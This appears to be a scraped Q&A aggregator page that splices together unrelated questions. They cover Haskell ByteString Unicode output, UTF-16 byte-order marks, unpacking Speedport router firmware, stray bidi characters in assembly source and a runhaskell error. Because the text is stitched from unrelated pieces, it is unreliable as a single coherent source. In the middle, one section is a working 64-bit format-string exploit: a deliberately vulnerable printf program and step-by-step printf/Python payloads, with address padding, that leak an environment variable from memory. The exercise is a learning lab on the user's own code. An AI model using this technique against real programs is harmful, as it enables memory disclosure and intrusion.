Answering haskell-convert-unicode-sequence-to-utf-8 I came upon some strange behaviour of ByteString.putStrLn
{-# LANGUAGE OverloadedStrings #-}
module Main where
import Data.Text (Text)
import Data.ByteString (ByteString)
import qualified Data.ByteString.Char8 as B
inputB, inputB' :: ByteString
inputB = "ДЕЖЗИЙКЛМНОПРСТУФ"
inputB' = "test"
main :: IO ()
main = do putStr "B.putStrLn inputB: "; B.putStrLn inputB
putStr "print inputB: "; print inputB
putStr "B.putStrLn inputB': "; B.putStrLn inputB'
putStr "print inputB': "; print inputB'
which yields
B.putStrLn inputB:
rint inputB: "\DC4\NAK\SYN\ETB\CAN\EM\SUB\ESC\FS\GS\RS\US !\"#$"
B.putStrLn inputB': test
print inputB': "test"
what I do not understand here is - why the first output line is missing and the p in print on the second line is missing.
My guess would be that this has something to do with the russian letters leading to malformed input. Because with the simple case of "test" it just works.
Edit
Platform: Linux Mint 17.3
file-encoding: UTF-8
terminal: gnome-terminal/tmux/zsh
ghc: 7.10.3
stack: 1.0.4
xxd output
> stack exec -- unicode | xxd
00000000: 422e 7075 7453 7472 4c6e 2069 6e70 7574 B.putStrLn input
00000010: 423a 2014 1516 1718 191a 1b1c 1d1e 1f20 B: ............
00000020: 2122 2324 0a70 7269 6e74 2069 6e70 7574 !"#$.print input
00000030: 423a 2022 5c44 4334 5c4e 414b 5c53 594e B: "\DC4\NAK\SYN
00000040: 5c45 5442 5c43 414e 5c45 4d5c 5355 425c \ETB\CAN\EM\SUB\
00000050: 4553 435c 4653 5c47 535c 5253 5c55 5320 ESC\FS\GS\RS\US
00000060: 215c 2223 2422 0a42 2e70 7574 5374 724c !\"#$".B.putStrL
00000070: 6e20 696e 7075 7442 273a 2074 6573 740a n inputB': test.
00000080: 7072 696e 7420 696e 7075 7442 273a 2022 print inputB': "
00000090: 7465 7374 220a test".
libraries
> stack exec -- ghc-pkg list
/opt/ghc/7.10.3/lib/ghc-7.10.3/package.conf.d
Cabal-1.22.5.0
array-0.5.1.0
base-4.8.2.0
bin-package-db-0.0.0.0
binary-0.7.5.0
bytestring-0.10.6.0
containers-0.5.6.2
deepseq-1.4.1.1
directory-1.2.2.0
filepath-1.4.0.0
ghc-7.10.3
ghc-prim-0.4.0.0
haskeline-0.7.2.1
hoopl-3.10.0.2
hpc-0.6.0.2
integer-gmp-1.0.0.0
pretty-1.1.2.0
process-1.2.3.0
rts-1.0
template-haskell-2.10.0.0
terminfo-0.4.0.1
time-1.5.0.1
transformers-0.4.2.0
unix-2.7.1.0
xhtml-3000.2.1
/home/epsilonhalbe/.stack/snapshots/x86_64-linux/lts-5.5/7.10.3/pkgdb
text-1.2.2.0
/home/epsilonhalbe/programming/unicode/.stack-work/install/x86_64-linux/lts-5.5/7.10.3/pkgdb
and the locale
> locale
LANG=en_US.UTF-8
LANGUAGE=
LC_CTYPE="en_US.UTF-8"
LC_NUMERIC=de_AT.UTF-8
LC_TIME="en_US.UTF-8"
LC_COLLATE="en_US.UTF-8"
LC_MONETARY=de_AT.UTF-8
LC_MESSAGES="en_US.UTF-8"
LC_PAPER=de_AT.UTF-8
LC_NAME=de_AT.UTF-8
LC_ADDRESS=de_AT.UTF-8
LC_TELEPHONE=de_AT.UTF-8
LC_MEASUREMENT=de_AT.UTF-8
LC_IDENTIFICATION=de_AT.UTF-8
LC_ALL=
It is not a terminal problem, rather, the problem happens early in the conversion to ByteString. Remember, because you used OverloadedStrings
inputB = "ДЕЖЗИЙКЛМНОПРСТУФ"
is really shorthand for
inputB = fromString "ДЕЖЗИЙКЛМНОПРСТУФ"::ByteString
which does not convert to a bytestring using UTF8.
If, instead, you want the bytestring to contain utf8 encoded chars, use
import qualified Data.ByteString.UTF8 as BU
inputB = BU.fromString "ДЕЖЗИЙКЛМНОПРСТУФ"
then this will work
B.putStrLn inputB
Why is the "p" on line two missing?
I won't go into detail (because I don't know them), but the behavior is expected.... Because your terminal is expecting UTF8, and the Russian string is not UTF8.
UTF8 uses variable length byte character encodings.... Depending on the first byte in a char, it might expect more. Clearly the last byte in the Russian string started a UTF8 encoding that required more bytes, and the "p" was read in to that char. Your terminal seems to just ignore chars it can't print (mine prints garbage), so both the Russian string and the next char were lost.
You will note that the "p" is in the xxd output.... The terminal just considering it to be part of the unknown chars and not printing it.
Quoting from the documentation of Data.ByteString.Char8
(emphasis mine)
Manipulate ByteStrings using Char operations. All Chars will be
truncated to 8 bits. It can be expected that these functions will run
at identical speeds to their Word8 equivalents in Data.ByteString.
More specifically these byte strings are taken to be in the subset of
Unicode covered by code points 0-255. This covers Unicode Basic Latin,
Latin-1 Supplement and C0+C1 Controls.
Cyrillic is not allocated in code points 0x00-0xFF, so encoding issues are to be expected.
I would recommend against Data.ByteString.Char8 unless you are dealing with plain ASCII. Even if latin-1 encoded texts may work in certain environment, the latin-1 encoding is obsolescent and should die.
For handling general strings, use Data.Text instead. Conversion functions from ByteStrings to Text, and vice versa, are provided. Of course, these functions have to depend on some encoding.
Related
I'm trying to read a value from the environment by using the format string vulnerability.
This type of vulnerability is documented all over the web, however the examples that I've found only cover 32 bits Linux, and my desktop's running a 64 bit Linux.
This is the code I'm using to run my tests on:
//fmt.c
#include <stdio.h>
#include <string.h>
int main (int argc, char *argv[]) {
char string[1024];
if (argc < 2)
return 0;
strcpy( string, argv[1] );
printf( "vulnerable string: %s\n", string );
printf( string );
printf( "\n" );
}
After compiling that I put my test variable and get its address. Then I pass it to the program as a parameter and I add a bunch of format in order to read from them:
$ export FSTEST="Look at my horse, my horse is amazing."
$ echo $FSTEST
Look at my horse, my horse is amazing.
$ ./getenvaddr FSTEST ./fmt
FSTEST: 0x7fffffffefcb
$ printf '\xcb\xef\xff\xff\xff\x7f' | od -vAn -tx1c
cb ef ff ff ff 7f
313 357 377 377 377 177
$ ./fmt $(printf '\xcb\xef\xff\xff\xff\x7f')`python -c "print('%016lx.'*10)"`
vulnerable string: %016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.
00000000004052a0.0000000000000000.0000000000000000.00000000ffffffff.0000000000000060.
0000000000000001.00000060f7ffd988.00007fffffffd770.00007fffffffd770.30257fffffffefcb.
$ echo '\xcb\xef\xff\xff\xff\x7f%10$16lx'"\c" | od -vAn -tx1c
cb ef ff ff ff 7f 25 31 30 24 31 36 6c 78
313 357 377 377 377 177 % 1 0 $ 1 6 l x
$ ./fmt $(echo '\xcb\xef\xff\xff\xff\x7f%10$16lx'"\c")
vulnerable string: %10$16lx
31257fffffffefcb
The 10th value contains the address I want to read from, however it's not padded with 0s but with the value 3125 instead.
Is there a way to properly pad that value so I can read the environment variable with something like the '%s' format?
So, after experimenting for a while, I ran into a way to read an environment variable by using the format string vulnerability.
It's a bit sloppy, but hey - it works.
So, first the usual. I create an environment value and find its location:
$ export FSTEST="Look at my horse, my horse is amazing."
$ echo $FSTEST
Look at my horse, my horse is amazing.
$ /getenvaddr FSTEST ./fmt
FSTEST: 0x7fffffffefcb
Now, no matter how I tried, putting the address before the format strings always got both mixed, so I moved the address to the back and added some padding of my own, so I could identify it and add more padding if needed.
Also, python and my environment don't get along with some escape sequences, so I ended up using a mix of both the python one-liner and printf (with an extra '%' due to the way the second printf parses a single '%' - be sure to remove this extra '%' after you test it with od/hexdump/whathaveyou)
$ printf `python -c "print('%%016lx|' *1)"\
`$(printf '--------\xcb\xef\xff\xff\xff\x7f\x00') | od -vAn -tx1c
25 30 31 36 6c 78 7c 2d 2d 2d 2d 2d 2d 2d 2d cb
% 0 1 6 l x | - - - - - - - - 313
ef ff ff ff 7f
357 377 377 377 177
With that solved, next step would be to find either the padding or (if you're lucky) the address.
I'm repeating the format string 110 times, but your mileage might vary:
./fmt `python -c "print('%016lx|' *110)"\
`$(printf '--------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|%016lx|%016lx|...|--------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
0000000000000324|...|2d2d2d2d2d2d7c78|7fffffffefcb2d2d|0000038000000300|
00007fffffffd8d0|00007ffff7ffe6d0|--------
The consecutive '2d' values are just the hex values for '-'
After adding more '-' for padding and testing, I ended up with something like this:
./fmt `python -c "print('%016lx|' *110)"\
`$(printf '------------------------------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|%016lx|...|------------------------------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
000000000000033a|...|2d2d2d2d2d2d7c78|2d2d2d2d2d2d2d2d|2d2d2d2d2d2d2d2d|
2d2d2d2d2d2d2d2d|00007fffffffefcb|------------------------------
So, the address got pushed towards the very last format placeholder.
Let's modify the way we output these format placeholders so we can manipulate the last one in a more convenient way:
$ ./fmt `python -c "print('%016lx|' *109 + '%016lx|')"\
`$(printf '------------------------------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|...|------------------------------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
000000000000033a|...|2d2d2d2d2d2d7c78|2d2d2d2d2d2d2d2d|2d2d2d2d2d2d2d2d|
2d2d2d2d2d2d2d2d|00007fffffffefcb|------------------------------
It should show the same result, but now it's possible to use an '%s' as the last placeholder.
Replacing '%016lx|' with just '%s|' wont work, because the extra padding is needed. So, I just add 4 extra '|' characters to compensate:
./fmt `python -c "print('%016lx|' *109 + '||||%s|')"\
`$(printf '------------------------------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|...|||||%s|------------------------------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
000000000000033a|...|2d2d2d2d2d2d7c73|2d2d2d2d2d2d2d2d|2d2d2d2d2d2d2d2d|
2d2d2d2d2d2d2d2d|||||Look at my horse, my horse is amazing.|
------------------------------
Voilà, the environment variable got leaked.
This question already has answers here:
Is the [0xff, 0xfe] prefix required on utf-16 encoded strings?
(5 answers)
Closed 4 years ago.
I am playing with Unicode encoding using Python-3 and noticed a behavior which I am not able to understand.
Following cases work as expected :-
x = "A"
fo = open("test.txt","w",encoding="utf_8")
fo.write(x)
fo.close()
xxd -b test.txt
00000000: 01000001 (1 Byte as expected)
x = "A"
fo = open("test.txt","w",encoding="utf_16_le")
fo.write(x)
fo.close()
xxd -b test.txt
00000000: 01000001 00000000 (2 Bytes as expected)
x = "A"
fo = open("test.txt","w",encoding="utf_16_be")
fo.write(x)
fo.close()
xxd -b test.txt
00000000: 00000000 01000001 (2 Bytes as expected)
Why 4 Bytes with utf_16 encoding? :-
My understanding is that UTF-16 is a variable length character encoding that uses either 16-bit or 32-bit depending on the character. For the charcater A, it should use only 16-bits. Can someone please help me understand this behavior?
x = "A"
fo = open("test.txt","w",encoding="utf_16")
fo.write(x)
fo.close()
xxd -b test.txt
00000000: 11111111 11111110 01000001 00000000
The first two bytes are the UTF 16 byte order marker (BOM). See http://www.unicode.org/faq/utf_bom.html
I am trying to build my own Linux derivative to run on an TI-AR7 board. I took the board from an old Telekom Speedport W 501V router. To understand how firmware is flashed onto the device I have downloaded the most recent official firmware. Using the Linux file command I determined the image is a tar archive, which can be extracted easily.
ubuntu#ip-172-31-23-210:~/reverse$ ls
fw_speedport_w501v_v_28.04.38.image
ubuntu#ip-172-31-23-210:~/reverse$ file fw*
fw_speedport_w501v_v_28.04.38.image: POSIX tar archive (GNU)
ubuntu#ip-172-31-23-210:~/reverse$ tar -xvf fw*
./var/
./var/tmp/
./var/tmp/kernel.image
./var/tmp/filesystem.image
./var/flash_update.ko
./var/flash_update.o
./var/info.txt
./var/install
./var/chksum
./var/regelex
./var/signature
ubuntu#ip-172-31-23-210:~/reverse$
According to a wiki (Firmware-Image) that I have found, ./var/tmp/kernel.image contains the actual firmware. During the update process this image is written to the mtd1 device. As stated in the wiki (LZMA-Kernel) the lzma compressed kernel starts with the magic number 0xfeed1281. A hexdump of kernel.image contains that number at its beginning.
ubuntu#ip-172-31-23-210:~/reverse/var/tmp$ hexdump -n 4 kernel.image
0000000 1281 feed
0000004
ubuntu#ip-172-31-23-210:~/reverse/var/tmp$
The following script given on the last wiki entry should decompress the kernel.
#! /usr/bin/perl
use Compress::unLZMA;
use Archive::Zip;
open INPUT, "<$ARGV[0]" or die "can't open $ARGV[0]: $!";
read INPUT, $buf, 4;
$magic = unpack("V", $buf);
if ($magic != 0xfeed1281) {
die "bad magic";
}
read INPUT, $buf, 4;
$len = unpack("V", $buf);
read INPUT, $buf, 4*2; # address, unknown
read INPUT, $buf, 4;
$clen = unpack("V", $buf);
read INPUT, $buf, 4;
$dlen = unpack("V", $buf);
read INPUT, $buf, 4;
$cksum = unpack("V", $buf);
printf "Archive checksum: 0x%08x\n", $cksum;
read INPUT, $buf, 1+4; # properties, dictionary size
read INPUT, $dummy, 3; # alignment
$buf .= pack('VV', $dlen, 0); # 8 bytes of real size
#$buf .= pack('VV', -1, -1); # 8 bytes of real size
read INPUT, $buf2, $clen;
$crc = Archive::Zip::computeCRC32($buf2);
printf "Input CRC32: 0x%08x\n", $crc;
if ($cksum != $crc) {
die "wrong checksum";
}
$buf .= $buf2;
$data = Compress::unLZMA::uncompress($buf);
unless (defined $data) {
die "uncompress: $#";
}
open OUTPUT, ">$ARGV[1]" or die "can't write $ARGV[1]";
print OUTPUT $data;
#truncate OUTPUT, $dlen;
To use the script you may need to install Compress::unLZMA and Archive::Zip perl modules.
ubuntu#ip-172-31-23-210:~/reverse/var/tmp$ tar -xvf Compress*
Compress-unLZMA-0.04/
Compress-unLZMA-0.04/Makefile.PL
Compress-unLZMA-0.04/ppport.h
Compress-unLZMA-0.04/Changes
Compress-unLZMA-0.04/lzma_sdk/
[...]
ubuntu#ip-172-31-23-210:~/reverse/var/tmp$ cd Compress*
ubuntu#ip-172-31-23-210:~/reverse/var/tmp/Compress-unLZMA-0.04$ perl Makefile.PL
Checking if your kit is complete...
Looks good
Writing Makefile for Compress::unLZMA
Writing MYMETA.yml and MYMETA.json
ubuntu#ip-172-31-23-210:~/reverse/var/tmp/Compress-unLZMA-0.04$ make
cp lib/Compress/unLZMA.pm blib/lib/Compress/unLZMA.pm
/usr/bin/perl /usr/share/perl/5.18/ExtUtils/xsubpp -typemap /usr/share/perl/5.18/ExtUtils/typemap unLZMA.xs > unLZMA.xsc && mv unLZMA.xsc unLZMA.c
cc -c -I. -Ilzma_sdk/Source -D_REENTRANT -D_GNU_SOURCE
[...]
ubuntu#ip-172-31-23-210:~/reverse/var/tmp/Compress-unLZMA-0.04$ sudo make install
Files found in blib/arch: installing files in blib/lib into architecture dependent library tree
Installing /usr/local/lib/perl/5.18.2/auto/Compress/unLZMA/unLZMA.bs
Installing /usr/local/lib/perl/5.18.2/auto/Compress/unLZMA/unLZMA.so
Installing /usr/local/lib/perl/5.18.2/Compress/unLZMA.pm
Installing /usr/local/man/man3/Compress::unLZMA.3pm
Appending installation info to /usr/local/lib/perl/5.18.2/perllocal.pod
ubuntu#ip-172-31-23-210:~/reverse/var/tmp/Compress-unLZMA-0.04$ # same for Archive::Zip module
After installing these dependencies the script decompressed the kernel successfully.
ubuntu#ip-172-31-23-210:~/reverse/var/tmp$ ./decompress.pl kernel.image kernel.decompressed
Archive checksum: 0x29176e12
Input CRC32: 0x29176e12
ubuntu#ip-172-31-23-210:~/reverse/var/tmp$
But what kind of file is kernel.decompressed and how do I generate a similar file from my Linux kernel source? I continued analyzing it using file and binwalk.
ubuntu#ip-172-31-23-210:~/reverse/var/tmp$ file kernel.decompressed
kernel.decompressed: data
ubuntu#ip-172-31-23-210:~/reverse/var/tmp$ binwalk kernel.decompressed
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
1509632 0x170900 Linux kernel version "2.6.13.1-ohio (686) (gcc version 3.4.6) #9 Wed Apr 4 13:48:08 CEST 2007"
1516240 0x1722D0 CRC32 polynomial table, little endian
1517535 0x1727DF Copyright string: "Copyright 1995-1998 Mark Adler "
1549488 0x17A4B0 Unix path: /usr/gnemul/irix/
1550920 0x17AA48 Unix path: /usr/lib/libc.so.1
1618031 0x18B06F Neighborly text, "neighbor %.2x%.2x.%.2x:%.2x:%.2x:%.2x:%.2x:%.2x lost on port %d(%s)(%s)"
1966080 0x1E0000 gzip compressed data, maximum compression, from Unix, last modified: 2007-04-04 11:45:13
ubuntu#ip-172-31-23-210:~/reverse/var/tmp$
So the Linux kernel starts at 1509632 and ends at 1516240. What kind of data is stored in front the Linux kernel (0 to 1509632)? I extracted the kernel and that piece of unknown data using dd.
ubuntu#ip-172-31-23-210:~/reverse/var/tmp$ dd if=kernel.decompressed of=unknown.data bs=1 count=1509632
1509632+0 records in
1509632+0 records out
1509632 bytes (1.5 MB) copied, 1.62137 s, 931 kB/s
ubuntu#ip-172-31-23-210:~/reverse/var/tmp$ dd if=kernel.decompressed of=kernel bs=1 skip=1509632 count=6608
6608+0 records in
6608+0 records out
6608 bytes (6.6 kB) copied, 0.0072771 s, 908 kB/s
ubuntu#ip-172-31-23-210:~/reverse/var/tmp$
I need to ask again: What kind of file is kernel and how do I generate a similar file from my Linux kernel source? I used xxd and strings to look at the file more closely.
ubuntu#ip-172-31-23-210:~/reverse/var/tmp$ xxd -l 100 kernel
0000000: 4c69 6e75 7820 7665 7273 696f 6e20 322e Linux version 2.
0000010: 362e 3133 2e31 2d6f 6869 6f20 2836 3836 6.13.1-ohio (686
0000020: 2920 2867 6363 2076 6572 7369 6f6e 2033 ) (gcc version 3
0000030: 2e34 2e36 2920 2339 2057 6564 2041 7072 .4.6) #9 Wed Apr
0000040: 2034 2031 333a 3438 3a30 3820 4345 5354 4 13:48:08 CEST
0000050: 2032 3030 370a 0000 0000 0000 0000 0000 2007...........
0000060: 0000 0000 ....
ubuntu#ip-172-31-23-210:~/reverse/var/tmp$ strings kernel
Linux version 2.6.13.1-ohio (686) (gcc version 3.4.6) #9 Wed Apr 4 13:48:08 CEST 2007
do_be
do_bp
do_tr
do_ri
do_cpu
nmi_exception_handler
do_ade
emulate_load_store_insn
do_page_fault
context_switch
__put_task_struct
do_exit
local_bh_enable
run_workqueue
2.6.13.1-ohio gcc-3.4
enable_irq
__free_pages_ok
free_hot_cold_page
prep_new_page
kmem_cache_destroy
kmem_cache_create
pageout
vunmap_pte_range
vmap_pte_range
__vunmap
__brelse
sync_dirty_buffer
bio_endio
queue_kicked_iocb
proc_get_inode
remove_proc_entry
sysfs_get
sysfs_fill_super
kref_get
kref_put
0123456789abcdefghijklmnopqrstuvwxyz
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
vsnprintf
{zt^f
pw0Gm
0cIZ-
68BG+
QC]S%
v,;Zk
ubuntu#ip-172-31-23-210:~/reverse/var/tmp$
This Github repository contains the extracted files to use for further analysis.
I have trouble compiling my assembly code.
gcc returns: func_select.s:5: Error: invalid character (0xe2) in mnemonic
func_select.s:7: Error: invalid character (0xe2) in mnemonic
here is the code (lines 5-7):
secondStringLength: .string " second pstring length: %d\n"
OldChar: .string "old char: %c,"
NewChar: .string " new char: %c,"
How can I fix this?
Remove the formatting characters embedded in the text.
$ charinfo 'secondStringLength:.string " second pstring length: %d\n"'
U+0073 LATIN SMALL LETTER S [Ll]
U+0065 LATIN SMALL LETTER E [Ll]
...
U+0068 LATIN SMALL LETTER H [Ll]
U+003A COLON [Po]
U+202B RIGHT-TO-LEFT EMBEDDING [Cf]
U+202A LEFT-TO-RIGHT EMBEDDING [Cf]
U+002E FULL STOP [Po]
U+0073 LATIN SMALL LETTER S [Ll]
...
U+0025 PERCENT SIGN [Po]
U+0064 LATIN SMALL LETTER D [Ll]
U+202C POP DIRECTIONAL FORMATTING [Cf]
U+202C POP DIRECTIONAL FORMATTING [Cf]
U+005C REVERSE SOLIDUS [Po]
U+006E LATIN SMALL LETTER N [Ll]
U+0022 QUOTATION MARK [Po]
Igancio Vazquez-Abrams is right. To provide more detail, according to xxd this is your first line:
$ cat b | xxd
00000000: 7365 636f 6e64 5374 7269 6e67 4c65 6e67 secondStringLeng
00000010: 7468 3a20 2020 2020 e280 abe2 80aa 2e73 th: .......s
00000020: 7472 696e 6720 2220 7365 636f 6e64 2070 tring " second p
00000030: 7374 7269 6e67 206c 656e 6774 683a 2025 string length: %
00000040: 64e2 80ac e280 ac5c 6e22 0a0a d......\n"..
Note: e2 80 ab and then e2 80 aa. These are the U+202B and U+202A mentioned earlier. Remove them (as well as the next 2 U+202C).
Heres my code:
factorial :: Integer -> Integer
factorial n = product [1..n]
main = print(factorial 50)
I don't get any errors compiling, but when i run the compiled code
runhaskell test
I get this error:
test:1:1: lexical error at character '\DEL'
What is causing this? How do I solve the problem?
UPDATES
I did a hexdump of the file:
$ hexdump -x test.hs
and got
0000000 6166 7463 726f 6169 206c 3a3a 4920 746e
0000010 6765 7265 2d20 203e 6e49 6574 6567 0a72
0000020 6166 7463 726f 6169 206c 206e 203d 7270
0000030 646f 6375 2074 315b 2e2e 5d6e 6d0a 6961
0000040 206e 203d 7270 6e69 2874 6166 7463 726f
0000050 6169 206c 3035 0029
0000057
Make sure that you're using runhaskell with the source file test.hs rather than the compiled binary test.
If you've used something like ghc to create an executable file, you can just run that directly, with something like:
./test
Be aware that test is probably not a good name for an executable since it's a built-in command on some shells, something that's burnt me before when my test executable doesn't seem to do what I wanted :-)